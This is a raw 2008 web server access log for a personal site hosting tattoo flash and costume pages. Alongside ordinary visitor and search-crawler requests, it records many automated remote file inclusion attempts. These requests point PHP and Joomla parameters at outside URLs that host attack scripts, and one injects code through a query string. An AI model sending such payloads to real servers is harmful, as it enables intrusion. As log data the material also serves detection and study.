81.169.158.65 - - [28/Jul/2008:19:00:06 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
81.169.158.65 - - [28/Jul/2008:19:00:06 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
64.26.63.17 - - [28/Jul/2008:19:04:55 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
64.26.63.17 - - [28/Jul/2008:19:04:55 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
194.201.253.2 - - [28/Jul/2008:19:07:27 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:19:07:29 -0500] "GET /phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:19:07:31 -0500] "GET /logs/phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
64.26.63.17 - - [28/Jul/2008:19:08:20 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
64.26.63.17 - - [28/Jul/2008:19:08:20 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
208.53.183.150 - - [28/Jul/2008:19:09:21 -0500] "GET /logs/errors.php?error=http://projecten.ictlyceum.net/php/group/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.53.183.150 - - [28/Jul/2008:19:09:21 -0500] "GET /errors.php?error=http://projecten.ictlyceum.net/php/group/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.18.151.242 - - [28/Jul/2008:19:10:15 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
91.121.192.238 - - [28/Jul/2008:19:13:57 -0500] "GET /errors.php?error=http://szalikowcy.mlodzi.pl/serwis/uploads/download/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.192.238 - - [28/Jul/2008:19:13:57 -0500] "GET /logs/errors.php?error=http://szalikowcy.mlodzi.pl/serwis/uploads/download/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.201.253.2 - - [28/Jul/2008:19:20:55 -0500] "GET /logs/access_log.1214438400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:19:20:57 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:19:20:58 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
81.169.158.65 - - [28/Jul/2008:19:22:23 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
81.169.158.65 - - [28/Jul/2008:19:22:26 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
81.169.158.65 - - [28/Jul/2008:19:23:31 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 351 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
81.169.158.65 - - [28/Jul/2008:19:23:31 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
68.97.64.45 - - [28/Jul/2008:19:23:57 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:23:58 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:23:58 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:08 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:08 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:08 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:08 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:08 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:08 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:08 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:08 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:09 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:09 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
68.97.64.45 - - [28/Jul/2008:19:24:09 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; eMusic DLM/3)"
195.42.160.22 - - [28/Jul/2008:19:24:37 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
65.55.25.135 - - [28/Jul/2008:19:24:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [28/Jul/2008:19:24:44 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3298 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [28/Jul/2008:19:24:45 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [28/Jul/2008:19:24:46 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2155 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [28/Jul/2008:19:24:47 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [28/Jul/2008:19:24:49 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2819 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [28/Jul/2008:19:24:49 -0500] "GET /costume/links.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
69.94.30.30 - - [28/Jul/2008:19:27:30 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
69.94.30.30 - - [28/Jul/2008:19:27:30 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
194.201.253.2 - - [28/Jul/2008:19:27:39 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:19:27:40 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:19:27:42 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
216.199.200.75 - - [28/Jul/2008:19:30:03 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
216.199.200.75 - - [28/Jul/2008:19:30:08 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
62.149.205.38 - - [28/Jul/2008:19:30:11 -0500] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
62.149.205.38 - - [28/Jul/2008:19:30:11 -0500] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
72.232.189.170 - - [28/Jul/2008:19:31:55 -0500] "GET /logs/index.php?INCLUDE_FOLDER=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
72.232.189.170 - - [28/Jul/2008:19:31:56 -0500] "GET /index.php?INCLUDE_FOLDER=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
72.232.189.170 - - [28/Jul/2008:19:32:11 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
72.232.189.170 - - [28/Jul/2008:19:32:11 -0500] "GET /index.php?DOCUMENT_ROOT=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
151.1.210.219 - - [28/Jul/2008:19:32:49 -0500] "GET /logs/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
151.1.210.219 - - [28/Jul/2008:19:32:49 -0500] "GET /join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
151.1.210.219 - - [28/Jul/2008:19:34:57 -0500] "GET /logs/index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
151.1.210.219 - - [28/Jul/2008:19:34:57 -0500] "GET /index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
75.127.70.16 - - [28/Jul/2008:19:35:48 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
75.127.70.16 - - [28/Jul/2008:19:35:48 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
210.245.87.117 - - [28/Jul/2008:19:35:48 -0500] "GET /logs/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:19:35:48 -0500] "GET /join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
194.201.253.2 - - [28/Jul/2008:19:36:10 -0500] "GET /logs/access_log.1214438400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:19:36:12 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:19:36:13 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
210.245.87.117 - - [28/Jul/2008:19:39:33 -0500] "GET /logs/index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:19:39:34 -0500] "GET /index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
205.234.232.195 - - [28/Jul/2008:19:40:21 -0500] "GET /logs//atom.php5?page=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
205.234.232.195 - - [28/Jul/2008:19:40:21 -0500] "GET //atom.php5?page=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
195.42.160.22 - - [28/Jul/2008:19:42:37 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
92.51.129.21 - - [28/Jul/2008:19:42:38 -0500] "GET //include/write.php?dir=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
208.186.78.5 - - [28/Jul/2008:19:43:42 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://67.223.229.149/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.63"
208.186.78.5 - - [28/Jul/2008:19:43:42 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://67.223.229.149/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.63"
217.20.138.101 - - [28/Jul/2008:19:43:55 -0500] "GET /errors.php?error=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.20.138.101 - - [28/Jul/2008:19:43:55 -0500] "GET /logs/errors.php?error=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.42.160.22 - - [28/Jul/2008:19:47:49 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:19:47:50 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
210.245.87.117 - - [28/Jul/2008:19:47:50 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:19:47:50 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
195.42.160.22 - - [28/Jul/2008:19:47:56 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:19:47:56 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
207.36.180.118 - - [28/Jul/2008:19:49:05 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
207.36.180.118 - - [28/Jul/2008:19:49:06 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
67.18.151.242 - - [28/Jul/2008:19:50:06 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.18.151.242 - - [28/Jul/2008:19:50:07 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.18.151.242 - - [28/Jul/2008:19:50:10 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.18.151.242 - - [28/Jul/2008:19:50:11 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.220.163.9 - - [28/Jul/2008:19:50:20 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
74.220.163.9 - - [28/Jul/2008:19:50:20 -0500] "GET /e404.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
74.220.163.9 - - [28/Jul/2008:19:52:06 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
74.220.163.9 - - [28/Jul/2008:19:52:06 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
71.50.70.58 - - [28/Jul/2008:19:53:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.myembarq.com/google/index.php?_LT=GOLP_GBARGLBIN_UGLSR&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:37 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:37 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:58 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:58 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:58 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:58 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:58 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:58 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:58 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:53:59 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:00 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:01 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:01 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:36 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:37 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:37 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:37 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:37 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:37 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:39 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:39 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:40 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:40 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:54:43 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:12 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:12 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
